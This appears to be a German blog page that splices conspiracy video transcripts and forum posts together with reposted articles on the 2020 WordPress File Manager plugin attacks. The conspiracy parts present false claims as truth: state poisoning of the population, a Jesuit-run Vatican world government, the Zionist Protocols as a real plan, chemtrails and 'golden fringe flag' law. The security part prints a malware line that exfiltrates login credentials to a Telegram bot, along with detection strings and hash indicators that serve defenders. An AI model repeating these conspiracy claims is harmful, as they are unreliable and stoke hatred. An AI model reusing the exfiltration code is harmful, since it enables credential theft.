Kategorie: Implants

  • Vorsätzliche Vergiftung der Bevölkerung durch die eigene Regierung

    https://youtu.be/-5BI2kMHwtM
    „Vorsätzliche Vergiftung der Bevölkerung durch die eigene Regierung“
    „805 Aufrufe•24.09.2020: 199 Abonnenten: PUBLIC LAW 95-79 Gesetz zur Vergiftung der Bevölkerung.“

  • Angriffe auf Websites, auf denen eine anfällige Version des Dateimanager-Plugins ausgeführt wird

    „Angriffe auf Websites, auf denen eine anfällige Version des Dateimanager-Plugins ausgeführt wird“
    Conspiracy Revelation: 28.9.2020: Linguistische Korrektur..

    „Angriffe auf Websites, auf denen eine anfällige Version des Dateimanager-Plugins ausgeführt wird
    durch HTH_Editors | September 11, 2020 | 0 Kommentare WordPress Plugin, WordPress-Sicherheit
    Sicherheitsforscher haben kürzlich eine Sicherheitsanfälligkeit in einem Dateimanager-Plugin gemeldet, was anfangs mehr gefährdete als 700,000 WordPress-Sites. jedoch, in ein paar Tagen, die Anzahl der angegriffenen Standorte erreicht 2.6 Million.
    Mehrere Angreifer, die die Sicherheitsanfälligkeit des Dateimanager-Plugins ausnutzen.
    Laut Wordfence Forscher sind mehrere Bedrohungsakteure Schuld für diese Angriffe. Zwei spezifische Bedrohungsakteure sind bei den Exploits am erfolgreichsten. Es scheint, dass diese Angreifer jetzt Kennwörter schützen, das anfällige Kopien einer bestimmten Datei schützt…
    Der aktivste dieser Angreifer wurde als “Bajatax” identifiziert. Das Unternehmen hat zuvor Anmeldeinformationen von PrestaShop-Websites gestohlen. Zu den von den Forschern entdeckten Kompromissindikatoren gehören einfache Dateien, die die “Bajatax” Zeichenfolge beinhalten und Änderungen an der ursprünglichen anfälligen Datei connector.minimal.php durrchführt. Die letztere Datei soll alle anderen potenziellen Angreifer ausschließen. Die Forscher-Entdeckungen weisen darauf hin, dass diese Dateien von einigen der aktivsten IP-Adressen verwendet werden, die bei den Angriffen eingesetzt wurden.
    Infizierten Websites wird bösartiger Code hinzugefügt. Dieser Code verwendet die API von Telegram, um die Anmeldeinformationen aller Benutzer zu filtern, die sich bei der gefährdeten Site anmelden. In Ergänzung, Der gleiche Code wird auch zur Datei user.php hinzugefügt, bei der es sich um eine WordPress-Kerndatei handelt.
    Der zweite Angreifer, der die Sicherheitsanfälligkeit des Dateimanagers mit großem Erfolg ausnutzt, lässt einen bestimmten Infektor fallen,..index.php, mit einem MD5-Hash … und eine von diesem Infektor eingefügte Hintertür. Wordfence sagt im offiziellen Bericht. Dieser Angreifer schützt auch die Datei … mit einem Kennwort, um zu versuchen, andere Bedrohungsakteure auszusperren.
    Die Forscher skizzieren auch, dass die von diesem zweiten Schauspieler verwendete Hintertür seit vielen Jahren verwendet wird. jedoch, Mehrere Kopien davon können auf eine einzelne infizierte Site verteilt werden, Dies führt zu Persistenz, wenn kein Schutz vorhanden ist.
    Außerdem, Sobald die Hintertüren erfolgreich installiert wurden nutzt der Angreifer sie sicherlich, um weitere Änderungen an den WordPress-Kerndateien vorzunehmen.
    Was sollten Sie tun, wenn Sie eine anfällige Version des Dateimanager-Plugins verwendet haben??
    Der beste Sicherheitshinweis ist die Verwendung eines Sicherheitstools zum Scannen Ihrer Website nach Malware. Falls Sie feststellen, dass Ihre Website durch die in diesem Artikel beschriebenen Angriffe gefährdet wurde, sollten Sie in Betracht ziehen Ihre Website zu bereinigen, bevor Sie etwas anderes tun.
    Wenn Sie Eigentümer einer E-Commerce-Website sind, sollten Sie auch alle Ihre Benutzer kontaktieren, Lassen Sie sie wissen, dass Ihre Anmeldeinformationen möglicherweise kompromittiert wurden. Sie können die Gesamtsicherheit ihrer Website auch anhand der Tipps testen, die wir im folgenden Artikel bereitgestellt haben:
    Lesen Sie auch So testen Sie die Sicherheit Ihrer WordPress-Site“
    Quelle: https://howtohosting.guide/de/attacks-against-sites-running-vulnerable-file-manager-plugin/

  • WordPress malware using the Telegram API


    „WordPress malware using the Telegram API“
    „Panos Kesisis · 01st September 2020·Wordpress, PHP, Website Security“
    Conspiracy Revelation: 28.9.2020: I removed the Telegram APIs manually from all infected files…
    „wp_ajax_try_2020_v2“
    „file_get_contents(„https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=“ . urlencode$“
    „The malware looks to be infecting WordPress‘ core files, „File Manager“ and „WooCommerce“ plugins for now, including the latest version of WordPress (5.5) and Woocommerce (4.4.1). The files that seem to be affected are:
    wp-includes/user.php
    wp-admin/admin-ajax.php
    wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
    woocommerce/includes/wc-user-functions.php
    woocommerce/includes/class-wc-form-handler.php
    Expressions that can help to determine if your site is compromised are:
    „bajatax“
    „api.telegram.org“
    Since the code above is not hashed or obfuscated, it is extremely difficult to be scanned using a security plugin like wordfence or sucuri so manual intervention is advised.
    Steps to resolve
    Basic steps to resolve this is to replace all the wordpress core files with clean wp-admin and wp-includes folders and a fresh re-install of the woocommerce and wp file manager plugins. Always make sure to take a backup before attempting this.
    Also, in no cases there should be any references of those strings anywhere in your website’s files or database (with the exception of when using the official Telegram plugin for the 2nd string).
    Lastly, it is recommended to check on newly created WordPress usernames that might be injected into the database as well.

    Source: https://fixed.net/blog/wordpress-malware-using-the-telegram-api

  • Attackers Fight for Control of Sites Targeted in File Manager Vulnerability

    „Attackers Fight for Control of Sites Targeted in File Manager Vulnerability“
    Conspiracy Revelation: 28.9.2020: Wordfence caused a long time a WSOD on my page…not sure if it was a counterdefense mechanism of these notorious russian cleptocratic cyberhack spambot mafiosis, that dominate the Internet for the last 25 years with their viral loads… I will check that soon…I surely would have used wordfence if it didn´t lose compatibility aka WSOD which made it impossible for me to use it at a certain point in time with this webpage.
    These ico exploits are very old and typical russian cyber mafiosi method. At least 20 years old, also for Windows Systems.
    Update: I installed Wordfence now, it works again, the white screen of death was likely caused by these russian cyber mafiosis as a Malware Persistence Factor, so that their exploit could survive longer, that is a good indicator that the page is finally really cleansed from this filth.
    „This entry was posted in Research, Vulnerabilities, WordPress Security on September 10, 2020 by Ram Gall 5 Replies
    Last week, we covered a vulnerability in the File Manager plugin installed on over 700,000 WordPress sites. By Friday, September 4, 2020, we recorded attacks on over 1.7 million sites, and by today, September 10, 2020 the total number of sites attacked has increased to over 2.6 million. We’ve seen evidence of multiple threat actors taking part in these attacks, including minor efforts by the threat actor previously responsible for attacking millions of sites, but two attackers have been the most successful in exploiting vulnerable sites, and at this time, both attackers are password protecting vulnerable copies of the connector.minimal.php file.
    An early bird stealing passwords
    Our site cleaning team has found numerous indicators that the most active of these attacks are the work of a Moroccan threat actor known as “bajatax” which has historically stolen credentials from PrestaShop sites. These indicators include simple files containing only the string “bajatax” as well as modifications to the original vulnerable connector.minimal.php file designed to lock out all other attackers, containing a $content=“by bajatax” line of code. Logs from infected sites indicate these files are being added by some of the most active attacking IPs, and we were able to verify that this threat actor is behind the hardfork.php and hardfile.php IOCs mentioned in our initial post. This attacker was the first to attack this vulnerability at scale.
    Once a site is infected, the “bajatax” attacker adds malicious code that uses the Telegram messenger’s API to exfiltrate the credentials of any user logging into the site. This code is added to the WordPress core user.php file. If WooCommerce is installed, the wc-user-functions.php and class-wc-form-handler.php files will also be modified to exfiltrate user credentials. These credentials could then be resold or used to gain access to other accounts using the same credentials.
    We’ve found IOCs from this threat actor on a substantial number of sites. Despite this attacker’s efforts to lock out other hackers, they haven’t always managed to get their foot in the door first, but we’ve seen them make regular attempts to update the passwords on both the vulnerable connector.minimal.php file and on other files they’ve added to allow additional upload capability, while leaving the credential scraping functionality in place which consistently sends to the same Telegram chat ID of 1110165405.
    Our Threat Intelligence team has been hard at work adding malware signatures to detect Indicators of Compromise by the bajatax threat actor, and these have been available to Wordfence Premium users starting September 8, 2020. These signatures will be released to sites still using the free version of Wordfence after 30 days, starting October 8, 2020.
    A second attacker scattering backdoors
    The most prevalent single indicators of compromise we found are an infector, feoidasf4e0_index.php, with an MD5 hash of 6ea6623e8479a65e711124e77aa47e4c, and a backdoor inserted by this infector. In this case we are providing the MD5 hash since this file is extremely consistent, and as such the MD5 can be a useful indicator of compromise.
    This attacker is using the mkfile method outlined in our initial article rather than the upload method favored by the “bajatax” threat actor. This attacker is also adding password protection to the vulnerable connector.minimal.php file in an effort to lock out other attackers, though our attack data indicates this threat actor is using a consistent password.
    The feoidasf4e0_index.php file inserts two copies of the second backdoor with randomized filenames ending in _index.php whenever it is accessed. One copy is placed in the webroot, and one in a randomized writable folder on the site. Both backdoors have the same MD5 of 3f60851c9f7e37c0d8817101d2212c68. While the backdoor in question has been in use for several years, the fact that multiple copies might be scattered across an infected site would help this attacker maintain persistence in the absence of a thorough scanning solution. We’ve also seen additional copies of this backdoor with different MD5 hashes added by this attacker; these are simply the most common variants.
    Once these backdoors are in place, the attacker is using them to make additional modifications to core WordPress files, in some cases by using obfuscated code to include separate backdoors disguised as .ico files. While the prevalence of the feoidasf4e0_index.php file appears to be declining, the secondary backdoors added by this file are still extremely common, indicating that this attacker has managed to achieve some degree of persistence.
    The feoidasf4e0_index.php file itself appears to be a very slightly modified version of an infector used in previous campaigns that primarily added cryptominers and SEO spam to various sites, so these are viable monetization routes for this threat actor, though they could also simply lease access to a botnet of infected sites under their control.
    Other actors abound
    Our site cleaning team has cleaned a number of sites compromised by this vulnerability, and in many cases, malware from multiple threat actors is present. The aforementioned threat actors have been by far the most successful due to their efforts to lock out other attackers, and are collectively using several thousand IP addresses in their attacks. Nonetheless, we’ve seen attacks against this vulnerability from over 370,000 separate IP addresses.
    There has been almost no overlap between the IPs adding and accessing the feoidasf4e0_index.php file and the IPs adding and accessing the bajatax “hardfork” files. The single exception is the IP 51.83.216.204, which appears to be a third party opportunistically checking for the presence of both of these backdoors and then attempting to add a backdoor of its own, without much success. As more and more users update or remove the File Manager plugin, control of any infected sites will likely be split between these two threat actors.
    Conclusion
    In today’s article, we discussed the most common infections we’re seeing on sites where the File Manager vulnerability has been exploited as well as the predominant actors involved. We’ve also managed to link at least one of the attackers to a known threat actor and determine likely paths to monetization. If you or anyone you know has had a vulnerable version of the File Manager plugin installed, we urge you to scan your site for malware using a security solution such as Wordfence. If your site has been compromised by the “bajatax” threat actor, it is critical that you completely clean your site before contacting all of your users and advising them that their credentials may have been compromised, especially if you are running an e-commerce site.“
    „Some Agency September 10, 2020 at 2:42 pm:
    For that telegram chat room 1110165405 I deleted their webhook using the telegram API once I found out one of our clients sites was hacked. Hoping I helped the cause a little there lol. The index file found on this server was ‚fqsvoig675_index.php‘ and they injected code into ‚user.php‘ to send user creds to their telegram bot.
    https://api.telegram.org/botXXXXXXXX:XXXXXXX/deleteWebhook?chat_id=1110165405“
    „Surender September 10, 2020 at 8:58 pm:
    I am feeling lucky that I have been using Wordfence since beginning. It has always protected me from such attacks.
    Thank you Wordfence team.“
    „bloganchoi September 13, 2020 at 6:09 pm:
    File managers are very important, if you install an unknown plugin that is susceptible to critical vulnerabilities that lead to your website being hacked, be careful when installing any plugin on your site.“
    „Juan Erazo September 10, 2020 at 1:14 pm:
    That’s right. Our site suffers this attack the las week and only yesterday we are online again. We are using wordfence from now!“
    Source: https://www.wordfence.com/blog/2020/09/attackers-fight-for-control-of-sites-targeted-in-file-manager-vulnerability/

  • Hacker-Krieg um 300.000 gefährdete WordPress-Sites

    „Hacker-Krieg um 300.000 gefährdete WordPress-Sites“
    „Cybercrime“
    “ Bastivon Basti11. September 20200
    Vor einigen Tagen wurde eine schwerwiegende Sicherheitslücke im File Manager-Plugin für WordPress entdeckt. Obwohl die Lücke vom Entwickler innerhalb weniger Stunden behoben und mit Erscheinen von Version 6.9 ein Update zur Verfügung stand, wurde das Update nicht von allen Nutzern eingespielt. Das hat nun dazu geführt, dass einige Hacker um die Kontrolle von etwa 300.000 infizierten WordPress-Seiten kämpfen.
    Warum viele Nutzer des File Manager-Plugins kein Update eingespielt haben, ist unklar. Einige Nutzer haben das Plugin zwar entfernt (ursprünglich waren es 700.000, nun sind noch 600.000 Installationen), bei einem Teil dürfte es sich um vergessene oder nicht mehr gepflegte WordPress-Installationen handeln, aber ein Teil der Nutzerschaft hat eben kein Update durchgeführt.
    Wie Bleeping Computer gestern berichtete, werden derzeit über 2,6 Millionen WordPress-Installationen von unterschiedlichen Hackern angegriffen. So wie es derzeit aussieht, gibt es zwei Hauptakteure, die in dem Rennen um die Kontrolle die Nase vorne haben. Während einer Backdoors einbaut, versucht ein Anderer fremde Exloit-Versuche andere Angreifer zu blockieren, während er selbst erfolgreich Benutzerzugangsdaten klaut. Der Hacker ist unter dem Namen Bajatax bekannt.
    In all, Defiant’s researchers saw attacks trying to exploit this vulnerability originating from more than 370,000 separate IP addresses, with almost no overlap in backdoor access activity.
    Wenn sich die Aktivitäten beim Zugriff auf Backdoors nicht überschneiden, spricht das eher für abgestimmte Aktionen oder gar den gleichen Täter.
    Das ist ein schönes Beispiel dafür, was passieren kann, wenn Sicherheitsupdates nicht zeitnah eingespielt werden. Diese Lücke im File Manager-Plugin, bzw. die nicht eingespielten Updates, wird WordPress-Betreiber und auch Hoster noch länger beschäftigen.
    Weitere ausführliche Informationen zu den Aktivitäten der Hacker hat Wordfence veröffentlicht.“
    Quelle: https://netzbasti.de/2020/09/11/hacker-krieg-um-300-000-gefaehrdete-wordpress-sites/

  • Attacks Targeting Recent WordPress File Manager Flaw Ramping Up

    „Attacks Targeting Recent WordPress File Manager Flaw Ramping Up
    By Ionut Arghire on September 11, 2020
    Attacks targeting a recently addressed vulnerability in the WordPress plugin File Manager are ramping up, warns the Wordfence Threat Intelligence team at WordPress security company Defiant.
    With over 700,000 active installs, File Manager is a highly popular WordPress plugin that provides admins with file and folder management capabilities (copy/paste, delete, download/upload, edit, and archive).
    In early September 2020, the plugin’s developer addressed a critical-severity zero-day flaw that was already being actively targeted. Assessed with a CVSS score of 10, the flaw can allow attackers to remotely execute code on a vulnerable installation.
    The issue is related to code taken from the elFinder project, with the File Manager developers renaming the elFinder library’s connector.minimal.php.dist file to .php, to have it execute directly. This, however, opened the plugin to attackers.
    Nearly two weeks after a patch for the vulnerability was released, multiple threat actors are targeting unpatched installations, Wordfence researchers reveal.
    Within days after the zero-day was patched, attackers were targeting over 1.7 million sites, but that number increased to 2.6 million as of September 10.
    “We’ve seen evidence of multiple threat actors taking part in these attacks, including minor efforts by the threat actor previously responsible for attacking millions of sites, but two attackers have been the most successful in exploiting vulnerable sites, and at this time, both attackers are password protecting vulnerable copies of the connector.minimal.php file,” Wordfence notes.
    The most active of the attackers is a Moroccan threat actor referred to as “bajatax,” which modifies the vulnerable connector.minimal.php file to prevent further attacks. This is the first threat actor observed targeting the vulnerability at scale.
    Once it manages to compromise a website, the attacker adds code to exfiltrate user credentials using the Telegram messenger’s API. The code is added to the WordPress core user.php file and, if WooCommerce is installed, two more files are modified to steal user credentials.
    A second adversary targeting the security flaw is attempting to inject a backdoor into the vulnerable websites, and is protecting the connector.minimal.php file with a password, in an attempt to prevent other infections. However, it appears that the threat actor is using a consistent password across infections.
    Two copies of the backdoor are inserted into the infected website, one in the webroot and the other in a randomized writable folder, likely in an attempt to ensure persistence. The attacker leverages the backdoors to modify core WordPress files which would then be abused for monetization purposes, based on the threat actor’s previously observed modus operandi.
    On many of the compromised websites, Wordfence discovered malware from multiple adversaries. Attacks targeting the vulnerability were observed originating from more than 370,000 separate IP addresses, with almost no overlaps between the IPs used by the two most active attackers.
    “As more and more users update or remove the File Manager plugin, control of any infected sites will likely be split between these two threat actors,” Wordfence notes.
    Site administrators are advised to update the File Manager plugin as soon as possible, but also to scan their website for possible compromise and to remove any malicious code they might find.
    Related: WordPress ‚File Manager‘ Plugin Patches Critical Zero-Day Exploited in Attacks
    Related: WordPress Malware Targets WooCommerce Stores
    Related: Hackers Can Inject Code Into WordPress Sites via Flaw in Product Review Plugin“
    Source: https://www.securityweek.com/attacks-targeting-recent-wordpress-file-manager-flaw-ramping

  • Der geheime Krieg gegen das deutsche Volk und seine historischen Wurzeln


    „Der geheime Krieg gegen das deutsche Volk und seine
    historischen Wurzeln“
    „345 Aufrufe•17.09.2020“
    „Frieden Freiheit Wahrheit
    85 Abonnenten
    Der geheime Krieg gegen das deutsche Volk und seine historischen Wurzeln
    @dieZuversicht
    @unzensiert“


    „Codex Sinaiticus… der Krieg gegen die deutschen hat
    seine Wurzeln jedoch im Konflikt zwischen dem jesuitischen Vatikan und dem protestantischen Deutschland, der Chronologiekritiker Wilhelm Kammeier war überzeugt davon, dass die originalen Dokumente der germanischen Geschichte
    vernichtet und ersetzt wurden durch gefälschte Dokumente der gallisch-romanischen Geschichte.“
    „Während sich also die Herrscher der Neuzeit keinerlei Mühe machten überhaupt irgendetwas niederzuschreiben,
    existiert für die Kirche angeblich eine lückenlose Dokumentation der Geschichte bis zum fünften Jahrhundert nach
    Christus, daran wird erkennbar, dass die Kirche höchstwahrscheinlich rückwirkend sämtliche Dokumente bis zur Neuzeit gefälscht hat.“

    „Dass fast durch alle Jahrhunderte des Mittelalters
    Könige und Kaiser keine Register haben führen lassen, dann stehen wir vor dem ausserordentlichen Faktum, dass ganze
    Generationen einer bestimmten Klasse Menschen durch überaus hohen unter anhaltenden Schaden nicht um einen deut
    klüger geworden sein, so müsste man sich, wie gesagt, damit
    abfinden, die mittelalterlichen weltlichen Fürsten seien durch die Bank kindische Tore, um nicht zu sagen Halb-Idioten gewesen. Zitat Ende. Dies ist allerdings äußerst unwahrscheinlich, denn Kammeier konnte ebenfalls belegen, dass so gut wie alle kirchlichen Dokumente Anzeichen für
    Fälschungen aufweisen. (Die Fälschung der deutschen Geschichte – Verlag für ganzheitliche Forschung)“
    „Architektur ist neben Literatur das stärkste Band zwischen Gegenwart und Vergangenheit.“

    „Die deutsche Geschichte der letzten 400 Jahre, seit dem dreißigjährigen Krieg lässt sich verstehen als die
    schrittweise Zerstörung der Germania Magna…lateinisch für großes Germanien. Das alte Germanien beinhaltete vermutlich
    geografische Gebiete der Schweiz und Niederlande, sowie des heutigen Dänemarks, Österreichs, Ungarns, Frankreich und Teile Osteuropas.“
    „Es gab nie einen Apfel und im altdeutschen bedeutet der Wortstamm Abel einfach böse, der Sinn hinter dieser Geschichte ist, dass die Menschheit aus dem paradiesischen Zustand hinausgeworfen wurde, als das Böse in die Welt kam und bei Kain und Abel handelt es sich nicht um Namen zweier Menschen: Kein Abel bedeutet einfach kein Übel, Kain für kein und Abel für Übel, der text sollte wahrscheinlich beschreiben, weshalb das Böse in die Welt kam und die Menschen begannen sich gegenseitig Schaden zuzufügen.“
    „Das Wort katholisch enthält verschlüsselt ebenfalls die wahre Bedeutung, es kommt vom altdeutschen Wort Kautulum,
    die Irrlehre, dazu das adjektiv toll für dumm, verwirrt, albern und töricht, sowie die Formen Tholik und Katholik, was
    wörtlich die Verdummten, die Irregeleiteten, die Törichten bedeutet, dementsprechend lässt sich ableiten, welchen Ruf die Katholiken vor ihrer Machtergreifung genossen.“
    „Die Reformationslüge, die Reformation geschah nicht so, wie man es uns glauben machen will, in Wirklichkeit geschah es genau umgekehrt, das heißt die Katholiken waren die
    Reformatoren, die andere Gruppe waren die Protestanten,
    die gegen die katholischen Änderungen der heiligen Schriften protestierten, die Bedeutung liegt im Namen. Die Bibel gab es vor der Zeit der sogenannten Reformation noch nicht, sie ist ein Produkt des frühen 17 Jahrhunderts und wurde kurz nach dem Höhepunkt der Reformationskriege zusammengestellt, was wahrscheinlich die Zeit des dreißigjährigen Krieges war.
    “Die Belagerung von Bauzen – 1620.”
    Die Reformationskriege waren meine Ansicht nach der letzte große blutige Konflikt zwischen den Mächten des Lichtes und der Finsternis und die Finsternis hat gewonnen.
    Nachdem sie das freie deutsche Volk eliminiert hatten, stellten die Katholiken die Bibel als die wichtigsten
    Schriftstücke aus den zuvor frei zirkulierenden Büchern zusammen, aber sie veränderten wesentliche Elemente,
    der Grund dafür, dass in der Bibel immer noch Wahrheit zu finden ist, liegt darin, dass die Fälscher nicht viel Zeit hatten, da sie schnell eine Propagandaversion der Schriften erstellen mussten, um die Massen zu indoktrinieren und was noch wichtiger ist, sie, also die päpstlichen Katholiken, mussten auch wahre Elemente einfügen, um die Menschen davon zu überzeugen, dass sie die einzig richtige Religion vertreten, der Protest gegen den Vatikan vereinte
    ganz Europa und war dezentraler Natur, es gab nie die sogenannten Protestanten, im Sinne einer Art Religion, außer dass verschiedene Gruppen von Gnostikern und Häretikern in ihrem Willen vereint waren gegen die Institution Kirche in Rom zu kämpfen.” geschah es genau umgekehrt, das heißt die Katholiken waren die
    Reformatoren, die andere Gruppe waren die Protestanten,
    die gegen die katholischen Änderungen der heiligen Schriften protestierten, die Bedeutung liegt im Namen. Die Bibel gab es vor der Zeit der sogenannten Reformation noch nicht, sie ist ein Produkt des frühen 17 Jahrhunderts und wurde kurz nach dem Höhepunkt der Reformationskriege zusammengestellt, was wahrscheinlich die Zeit des dreißigjährigen Krieges war.
    „Die Belagerung von Bauzen – 1620.“
    Die Reformationskriege waren meine Ansicht nach der letzte große blutige Konflikt zwischen den Mächten des Lichtes und der Finsternis und die Finsternis hat gewonnen.
    Nachdem sie das freie deutsche Volk eliminiert hatten, stellten die Katholiken die Bibel als die wichtigsten
    Schriftstücke aus den zuvor frei zirkulierenden Büchern zusammen, aber sie veränderten wesentliche Elemente,
    der Grund dafür, dass in der Bibel immer noch Wahrheit zu finden ist, liegt darin, dass die Fälscher nicht viel Zeit hatten, da sie schnell eine Propagandaversion der Schriften erstellen mussten, um die Massen zu indoktrinieren und was noch wichtiger ist, sie, also die päpstlichen Katholiken, mussten auch wahre Elemente einfügen, um die Menschen davon zu überzeugen, dass sie die einzig richtige Religion vertreten, der Protest gegen den Vatikan vereinte
    ganz Europa und war dezentraler Natur, es gab nie die sogenannten Protestanten, im Sinne einer Art Religion, außer dass verschiedene Gruppen von Gnostikern und Häretikern in ihrem Willen vereint waren gegen die Institution Kirche in Rom zu kämpfen.“

    „Vorher dagegen wurde Deutschland als ein Ort des Friedens und der Aufklärung angesehen, der hochangesehene Cambridge
    Historiker …kommentierte ausführlich die hohe Wertschätzung Großbritanniens für Deutschland. Zitat: In England herrschte
    einst die Ansicht vor, dass die deutsche Geschichte vor allem die Geschichte der Freiheit sei, denn es war eine Geschichte,
    die den deutschen Bund, Parlamentarismus, autonome Städte, Protestantismus und ein Freiheitsgesetz umfassten, das von den deutschen Kolonien in den slawischen Osten getragen wurde.“

    „Heute sind es deutsche, die mit ihrem Wissen in Silicon Valley führend dabei sind die technokratische Weltordnung zu
    etablieren.“
    „Die Verbindung zu Atlantis sollte aus der Erinnerung ausgelöscht werden, obwohl der zweite Weltkrieg der letzte Sargnagel für die faktische Überlegenheit
    Deutschlands in Wissenschaft und Technologie war, ist der Krieg noch nicht vorbei, es geht nicht so sehr darum gegen ein bestimmtes Land zu kämpfen, sondern gegen eine bestimmte Gruppe von Menschen. Der Nationalsozialismus sollte
    Deutschland von Anfang an von innen heraus zerstören.“

  • Vortrag: Die NWO

    https://youtu.be/b_mMWKTHOsc
    „Vortrag: Die NWO
    249.168 Aufrufe
    •28.03.2020“
    „Hans-Joachim Müller
    93.700 Abonnenten“
    Der Vatikan ist Satan. (Hajo Müller)
    Im Vatikan werden dann alle Informationen zusammengetragen,
    unter Regie der größten Geheimorganisation der Welt, die Jesuiten. Jesuiten sind ein Orden, der den Vatikan
    steuert, es ist gleichzeitig Informationsquelle des Vatikans, Wachschutz des Vatikans und Dirigent des
    Vatikans, sie schützen damit die Firma vor Angriffen von außen und sorgen dafür, dass die Firma ihrer Aufgabe nachkommen kann, die Aufgabe des Vatikans ist die Anhäufung von Besitz. (Hajo Müller)“
    „Sogar Russland unterliegt noch dem römischen Recht. (Hajo Müller)“
    „Ich informiere Sie erstmal, über die Gruppen, die jetzt in der Welt um die Macht kämpfen und dazu stellen wir erstmal die Macht vor, die 650 Jahre lang die Welt regiert hat..also vor 1920 waren die Menschen schonmal so weit, dass sie das
    alles begriffen hatten, dieses Spiel…Ende des neunzehnten
    Jahrhunderts, da kam eine Betriebsvorschrift, nenne ich es immer in die Welt und das hieß die zionistischen Protokolle und da sind schon die einzelnen Schritte, in die wir uns bewegen, benannt. Es ist von einer Geheimregierung, die tatsächlich existiert. (Hajo Müller)“

  • Chemtrails Globalskywatch censored @ FB in July 2020…

    Chemtrails Globalskywatch censored @ FB in July 2020…
    „Russ Online Content #92184 07/29/2020
    OP Master Elite Member Joined: Dec 1999
    Posts: 28,602 Maine, USA ****
    „The Day The Music Died“
    „I, and my fellow moderators, spent over a decade (hundreds of thousands of man-hours) building a Facebook group that was deleted by Facebook yesterday. The group had 180,000 members from virtually every country in the world.. The group shared the truth about chemtrails: The intentional spraying of known poisons into the atmosphere.
    Link to deleted group: http://gsw.bz/gs
    Update: The group was reinstated 7/29/2020 and is now active.
    This toxic dispersal is the most dangerous and devastating attack on life that has ever been launched and is, I believe, the reason for the currently declining human lifespan. In fact, there is sufficient evidence that the death rates induced by this activity are dramatically understated by media and scientists who are owned by the industries profiting from the sickness and death being artificially induced.

    I have been a first-hand witness to the spraying because I am one of the small percentage of the population who can taste and smell it. Because of this, I have been able to correlate the presence of these poisons in the air with my own debilitating and life-threatening illnesses. To put it bluntly, every health issue I have (some life-threatening) is caused by these toxic releases reaching our lower atmosphere.

    I am emotionally numb. I have watched as other channels on social media platforms have been systematically banned and silenced simply because they told the truth or exposed corruption in government. I have been frustrated by this vast censorship and have attempted to bring it to public attention, but without widespread public outcry, we have made little progress. This vast censorship enables the truly-profound corruption in government and big-business to continue.
    Shortly before the covid event, my own company was censored. We were forced (as a result of FDA and FTC pressure) to delete about 200,000 web pages of in-depth, scientific, referenced information about herbs and vitamins. Much of this information showed the powerful anti-viral and anti-bacterial activity of inexpensive, easily-available herbs. This information could have saved lives and reduced the fear of this event, but it is now banned thanks to FDA/FTC pressure on companies that produce supplements.
    See: FTC and FDA Censor SCIENCE on Herbal Remedies Just Before U.S. Corona Outbreak
    http://orbisvitae.com/ubbthreads/ubbthreads.php?ubb=showflat&Number=91402#Post91402
    I have given hundreds of interviews over the years. Recently I was interviewed by BBC, CNN, and The Atlantic. I shared information about scientists speaking out about chemtrails, thousands of lab tests showing the results of atmospheric spraying, and dozens of other hard evidences of spraying. BBC printed nothing of this information and only mentioned me in one sentence associating me with „the paranoid“. This was no surprise, but I took the interview anyway for this very moment; for the moment when I could use it as further evidence, for you, that big media all works together to conceal corruption and promote lies and fake science. I have watched it happen for the past 25 years. Big media has lied about and concealed the truth about herbal and nutritional supplements. This information could be saving lives today, but is not, simply because the public does not have access to this scientific information because of FDA and FTC censorship.
    Finally, I will share one more truth.
    Look online for images of the flags of countries. For every country in the world you will find 2 different flags. One flag looks perfectly normal, but the other flag has a golden fringe around it. This golden fringe flag is a mechanism of profound deception that has been perpetrated upon the public of every country of the world. This flag is not a national flag, but rather a corporate flag representing a literal corporation that is governed by the Uniform Commercial Code (UCC). The UCC is a law system that presides all contracts and commerce. The UCC is the law system that presides in every court room that flies the golden fringe flag. Your local court house will fly your national flag outside while flying the corporate commercial flag in the courtrooms, in the tax offices, and virtually everywhere else. This flag flying in the presence of your business at these places enables your moral national law to be overridden by UCC corporate law which always greatly favors creditors and oppresses the public. This flag and the associated statutory system is what enables the income tax. Income tax was considered fundamentally immoral and therefore did not exist for the majority of U.S. history. Through a long and subversive program of subtle re-education, the public grew to accept income tax. As a result, the corporate entity known as the „United States“ that flies the golden fringe flag became much more wealthy than the nation known as the „united States“. With this wealth came growth, regulation, control, and ultimately, vast corruption.
    See: The UCC Connection:
    http://orbisvitae.com/ubbthreads/ubbthreads.php?ubb=showflat&Number=80464#Post80464
    This corporate entity with its golden fringe flag is the reason you have no constitutional rights in the courtroom. You have only „benefits and privileges“ which are attributes of a commercial (UCC) relationship but have nothing to do with a nation of people. This scheme to fool people into a binding relationship (an implied contract) with a commercial entity (literally a corporation) has been implemented in every nation of the world. You can see many artifacts of this scheme, the most visible being the golden fringe flag. Every nation has such a flag, along with their national flag, because this scheme has been implemented in every nation globally.
    In many of the interviews I have done, I have stated that the New World Order is already fully implemented and that we are now in the final stage of empowerment of this one-world government. The final stage is to get the public to fully accept it. I have stated that the motivation that will be used to gain this acceptance is fear. People will never be willing to give up their remaining (perceived) rights unless they are sufficiently afraid of something. The corporate entity (the corporate United States as opposed to the national „united States“) will then offer protection in exchange for your rights. This is the reason you hear newscasts repeat the phrase, „What rights are you willing to give up for your safety?“
    This method of conquest and control has been used throughout history, but it has never been as widespread as what we see happening today. Mainstream media is wholly-owned and controlled by the same super-wealthy families („globalists“) that own and control your public servants, so in effect, they control the entire corporate government through the age-old mechanism of bribes and „gifts“. Notice how politicians become rich during their terms in office. These super-wealthy families, utilizing mainstream media, scare you into giving up your (perceived) rights in exchange for „protection“.
    See: 1900 Famous Cartoon Showing Rockefeller Controlling the World:
    http://orbisvitae.com/ubbthreads/ubbthreads.php?ubb=showflat&Number=87164#Post87164
    See: Rockefeller Thanks Mainstream Media for Coverup of New World Order:
    http://orbisvitae.com/ubbthreads/ubbthreads.php?ubb=showflat&Number=88132#Post88132
    To scare you into submission, wealthy globalists ensure the perceived threat is sufficiently frightening. They use several methods to induce this level of public fear. In the current-day example, they implement measures for „public protection“ that are ever-present in every aspect of daily life. The public is dissuaded from believing such measures are propaganda simply because the measures are so vastly ubiquitous. Also, they must conceal cheap and readily-available remedies from the public. A scary problem without a solution is much more frightening, so when a solution comes, it is all the more valuable (profitable). Globalists conceal cheap and easily-obtainable solutions so they can offer you their solution, and they profit greatly from it.
    See: FTC and FDA Censor SCIENCE on Herbal Remedies Just Before U.S. Corona Outbreak:
    http://orbisvitae.com/ubbthreads/ubbthreads.php?ubb=showflat&Number=91402#Post91402

